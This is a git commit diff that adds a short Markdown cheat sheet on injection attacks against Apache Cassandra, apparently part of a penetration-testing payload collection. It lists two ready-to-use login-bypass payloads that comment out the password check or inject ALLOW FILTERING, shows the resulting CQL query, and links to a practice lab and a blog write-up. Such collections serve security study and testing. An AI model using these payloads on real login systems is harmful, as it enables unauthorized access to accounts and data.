Fix name - Part 1

2026-01-02 07:49:47 -08:00 · 2019-03-07 00:07:14 +01:00
parent ee334f981e
commit 21d1fe7eee
328 changed files with 199 additions and 1 deletions
--- a/Injection/Cassandra
+++ b/Injection/Cassandra
@@ -0,0 +1,37 @@
+# Cassandra Injection
+
+> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
+
+## Cassandra comment
+
+```sql
+/* Cassandra Comment */
+```
+
+## Cassandra - Login Bypass
+
+### Login Bypass 0
+
+```sql
+username: admin' ALLOW FILTERING; %00
+password: ANY
+```
+
+### Login Bypass 1
+
+```sql
+username: admin'/*
+password: */and pass>'
+```
+
+The injection would look like the following SQL query
+
+```sql
+SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
+```
+
+Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
+
+## References
+
+* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)